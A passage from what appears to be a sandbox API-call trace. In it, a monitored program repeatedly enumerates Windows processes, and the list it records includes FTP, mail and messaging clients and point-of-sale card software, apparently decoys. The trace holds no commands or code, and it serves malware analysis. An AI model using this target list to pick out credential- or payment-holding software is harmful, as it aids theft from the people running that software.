hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0159.439] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0159.442] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0159.444] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0159.446] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0159.448] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0159.450] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0159.454] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0159.456] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0159.458] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0159.461] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0159.463] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0159.465] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0159.468] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0159.471] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0159.474] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0159.477] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0159.479] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0159.482] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0159.485] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0159.487] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0159.493] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0159.496] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0159.498] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0159.501] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0159.504] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0159.506] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0159.510] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0159.513] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0159.516] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0159.519] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0159.521] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0159.524] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0159.526] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0159.532] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0159.534] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0159.536] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0159.538] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0159.540] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0159.543] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0159.546] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0159.549] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0159.552] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0159.554] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0159.558] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0159.560] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0159.563] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0159.566] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0159.570] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0159.573] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0159.575] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0159.578] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0159.581] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0159.583] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0159.586] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0159.589] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0159.591] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0159.594] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0159.596] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0159.599] Process32Next (in: hSnapshot=0x1b4c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0159.601] CloseHandle (hObject=0x1b4c) returned 1 [0159.601] Sleep (dwMilliseconds=0x64) [0159.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ed4 [0160.000] Process32First (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.002] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0160.005] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0160.007] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.010] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0160.011] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.014] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0160.016] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0160.018] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0160.373] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.376] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.378] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0160.380] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.382] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.384] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.386] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.389] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.391] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.393] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.395] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0160.397] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0160.400] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0160.402] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0160.404] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 